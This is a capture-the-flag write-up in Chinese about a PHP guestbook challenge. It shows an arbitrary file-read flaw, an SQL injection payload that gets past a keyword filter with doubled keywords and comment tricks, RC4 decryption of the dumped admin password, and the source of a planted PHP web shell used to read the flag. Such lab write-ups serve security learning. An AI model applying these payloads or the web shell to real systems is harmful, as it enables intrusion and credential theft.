Bugscan擂台赛-12

打开题目

TIM截图20170322162939.png

一个XYCMS搭建的PHP留言板,据说是一道代码审计。
进去后随便翻翻发现这个

TIM截图20170322163354.png

点进去，然后

TIM截图20170322163510.png

一处代码读取，默认参数是suanfa.php。读取一下include.php

 
 

  $file = $_GET['file'];
 if ($file == "" || strstr($file, 'Conf/xycms.inc.php')) {
 echo "想多了，数据库信息能让你看";
 exit;
 } else {
 $cut = strchr($file, "login");
 if ($cut == false) {
 $data = file_get_contents($file);
 $date = htmlspecialchars($data);
 echo $date;
 } else {
 echo "";
 }
 }
 ?>

伪代码读取，而且发现存在login目录。然后发现其他的几个文件，比较重要的有medium.php存在sql注入

 if ($_SERVER['HTTP_USER_AGENT'] != "seclover Browser") {
 echo '没用的！！！';
 exit;
 }
 $id = $_POST['soid'];
 include 'Conf/xycms.inc.php';
 include 'seclover.php';
 include 'filter.php';
 $id = seclover($id);
 $con = mysql_connect($db_address, $db_user, $db_pass) or die("不能连接到数据库！！" . mysql_error());
 mysql_select_db($db_name, $con);
 $id = mysql_real_escape_string($id);
 $sql = "SELECT * FROM message WHERE display=1 AND id={$id}";
 //echo $sql;
 $result = mysql_query($sql);
 $rs = mysql_fetch_array($result);
 echo htmlspecialchars($rs['nice']) . ':
 ' . filter($rs['say']) . '
';
 mysql_free_result($result);
 //mysql_free_result($file);
 mysql_close($con);
 ?> 

seclover.php过滤规则

 function seclover($content)
 {
 $keyword = array("select", "union", "and", "from", ' ', "'", ";", '"', "char", "or", "count", "master", "name", "pass", "admin", "+", "-", "order", "=");
 $info = strtolower($content);
 for ($i = 0; $i <= count($keyword); $i++) {
 $info = str_replace($keyword[$i], '', $info);
 }
 return $info;
 }

所以可以利用搜索功能进行注入，由于medium.php对UA进行验证所以抓包改一下UA得到：

TIM截图20170322164709.png

根据过滤规则可以用ununionion的方式绕过关键字的过滤，用/**/注释绕过空格的过滤。

TIM截图20170322165553.png

soid=1/ 
 /aandnd//1>2/ 
 /ununionion//selselectect/ 
 /1,2,3,group_concat(usernanameme,userpapassss)//frfromom/ 
 /adadminmin//limit/**/0,1

得到

TIM截图20170322175323.png

密码是加密过的，然后想到之前的suanfa.php

 base64_encode(rc4($content, "yangrong")); 
 
 function rc4($data, $pwd) 
 
 { 
 
 $cipher = ""; 
 
 $key[] = ""; 
 
 $box[] = ""; 
 
 $pwd_length = strlen($pwd); 
 
 $data_length = strlen($data); 
 
 for ($i = 0; $i < 256; $i++) { 
 
 $key[$i] = ord($pwd[$i % $pwd_length]); 
 
 $box[$i] = $i; 
 
 } 
 
 for ($j = $i = 0; $i < 256; $i++) { 
 
 $j = ($j + $box[$i] + $key[$i]) % 256; 
 
 $tmp = $box[$i]; 
 
 $box[$i] = $box[$j]; 
 
 $box[$j] = $tmp; 
 
 } 
 
 for ($a = $j = $i = 0; $i < $data_length; $i++) { 
 
 $a = ($a + 1) % 256; 
 
 $j = ($j + $box[$a]) % 256; 
 
 $tmp = $box[$a]; 
 
 $box[$a] = $box[$j]; 
 
 $box[$j] = $tmp; 
 
 $k = $box[($box[$a] + $box[$j]) % 256]; 
 
 $cipher .= chr(ord($data[$i]) ^ $k); 
 
 } 
 
 return $cipher; 
 
 }

先将密码进行rc4加密，然后再进行b64加密。
而rc4的解密方法就是将加密后的字符串再加密一次，所以只需要简单修改一下加密算法：
echo rc4(base64_decode('Cj7+2VxVao1/S5YESfmKwcA='),'yangrong');
得到密码：
helloevery1.2.3.4
然后登录后台得到：

TIM截图20170322175907.png

然后读取马的内容：

 $pwd = "cmd00"; 
 
 if (isset($_POST[$pwd]) && !empty($_POST[$pwd])) { 
 
 $cmd = $_POST['cmd']; 
 
 $path = $_POST['path']; 
 
 switch ($cmd) { 
 
 case 'ls': 
 
 echo @FileTreeCode($path); 
 
 break; 
 
 case 'cat': 
 
 echo @file_get_contents($path); 
 
 break; 
 
 default: 
 
 die('Command Not Found Or No Permission!'); 
 
 break; 
 
 } 
 
 } 
 
 function FileTreeCode($D) 
 
 { 
 
 $ret = ""; 
 
 $F = @opendir($D); 
 
 if ($F == NULL) { 
 
 $ret = "ERROR:// Path Not Found Or No Permission!"; 
 
 } else { 
 
 $M = NULL; 
 
 $L = NULL; 
 
 while ($N = @readdir($F)) { 
 
 $P = $D . "/" . $N; 
 
 $T = @date("Y-m-d H:i:s", @filemtime($P)); 
 
 @($E = substr(base_convert(@fileperms($P), 10, 8), -4)); 
 
 $R = "\t" . $T . "\t" . @filesize($P) . "\t" . $E . "\n"; 
 
 if (@is_dir($P)) { 
 
 $M .= $N . "/" . $R; 
 
 } else { 
 
 $L .= $N . $R; 
 
 } 
 
 } 
 
 $ret .= $M . $L; 
 
 @closedir($F); 
 
 } 
 
 return $ret; 
 
 }

构造请求：

TIM截图20170322180210.png

得到flag文件 ，然后利用cat输出flag：

TIM截图20170322180359.png